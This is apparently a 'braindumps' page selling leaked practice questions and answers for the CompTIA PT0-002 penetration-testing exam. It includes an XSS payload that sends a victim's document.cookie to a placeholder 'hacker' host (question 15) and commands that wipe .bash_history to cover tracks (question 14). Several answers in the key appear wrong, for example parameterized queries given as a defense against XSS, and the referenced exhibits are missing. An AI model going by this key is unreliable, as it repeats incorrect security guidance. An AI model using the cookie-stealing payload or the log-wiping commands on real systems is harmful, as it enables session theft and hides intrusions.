Your success in CompTIA PT0-002 is our sole target and we develop all our PT0-002 braindumps in a way that facilitates the attainment of this target. Not only is our PT0-002 study material the best you can find, it is also the most detailed and the most updated. PT0-002 Practice Exams for CompTIA PT0-002 are written to the highest standards of technical accuracy.

Free PT0-002 Demo Online For CompTIA Certifitcation:

NEW QUESTION 1
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

  • A. A signed statement of work
  • B. The correct user accounts and associated passwords
  • C. The expected time frame of the assessment
  • D. The proper emergency contacts for the client

Answer: B

NEW QUESTION 2
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
PT0-002 dumps exhibit


Solution:
* 1. Reflected XSS - Input sanitization (<> ...)
* 2. Sql Injection Stacked - Parameterized Queries
* 3. DOM XSS - Input Sanitization (<> ...)
* 4. Local File Inclusion - sandbox req
* 5. Command Injection - sandbox req
* 6. SQLi union - paramtrized queries
* 7. SQLi error - paramtrized queries
* 8. Remote File Inclusion - sandbox
* 9. Command Injection - input saniti $
* 10. URL redirect - prevent external calls

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 3
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

  • A. NIST SP 800-53
  • B. OWASP Top 10
  • C. MITRE ATT&CK framework
  • D. PTES technical guidelines

Answer: C

NEW QUESTION 4
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Capture traffic using Wireshark.
  • C. Perform a brute-force attack over the server.
  • D. Use an FTP exploit against the server.

Answer: B

NEW QUESTION 5
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:
PT0-002 dumps exhibit
Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Hydra and crunch
  • B. Netcat and cURL
  • C. Burp Suite and DIRB
  • D. Nmap and OWASP ZAP

Answer: C

NEW QUESTION 6
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

  • A. Nmap
  • B. Wireshark
  • C. Metasploit
  • D. Netcat

Answer: B

NEW QUESTION 7
Which of the following tools provides Python classes for interacting with network protocols?

  • A. Responder
  • B. Impacket
  • C. Empire
  • D. PowerSploit

Answer: B

NEW QUESTION 8
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?

  • A. Perform vertical privilege escalation.
  • B. Replay the captured traffic to the server to recreate the session.
  • C. Use John the Ripper to crack the password.
  • D. Utilize a pass-the-hash attack.

Answer: D

NEW QUESTION 9
A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client’s requirements?

  • A. “cisco-ios” “admin+1234”
  • B. “cisco-ios” “no-password”
  • C. “cisco-ios” “default-passwords”
  • D. “cisco-ios” “last-modified”

Answer: A

NEW QUESTION 10
You are a penetration tester running port scans on a server. INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
PT0-002 dumps exhibit
PT0-002 dumps exhibit


Solution:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

NEW QUESTION 11
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

  • A. PLCs will not act upon commands injected over the network.
  • B. Supervisors and controllers are on a separate virtual network by default.
  • C. Controllers will not validate the origin of commands.
  • D. Supervisory systems will detect a malicious injection of code/commands.

Answer: C

NEW QUESTION 12
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

  • A. chmod u+x script.sh
  • B. chmod u+e script.sh
  • C. chmod o+e script.sh
  • D. chmod o+x script.sh

Answer: A

NEW QUESTION 13
A penetration tester performs the following command: curl –I –http2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
PT0-002 dumps exhibit

  • A. Option A
  • B. Option B
  • C. Option C
  • D. Option D

Answer: A

NEW QUESTION 14
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch –r .bash_history temp mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

  • A. Redirecting Bash history to /dev/null
  • B. Making a copy of the user's Bash history for further enumeration
  • C. Covering tracks by clearing the Bash history
  • D. Making decoy files on the system to confuse incident responders

Answer: C

NEW QUESTION 15
Given the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Web-application firewall
  • B. Parameterized queries
  • C. Output encoding
  • D. Session tokens
  • E. Input validation
  • F. Base64 encoding

Answer: BE

NEW QUESTION 16
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. PowerShell modules
  • C. MP4 steganography
  • D. PsExec

Answer: D

NEW QUESTION 17
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. As backup in case the original documents are lost
  • B. To guide them through the building entrances
  • C. To validate the billing information with the client
  • D. As proof in case they are discovered

Answer: D

NEW QUESTION 18
......

Thanks for reading the newest PT0-002 exam dumps! We recommend you to try the PREMIUM Certshared PT0-002 dumps in VCE and PDF here: https://www.certshared.com/exam/PT0-002/ (110 Q&As Dumps)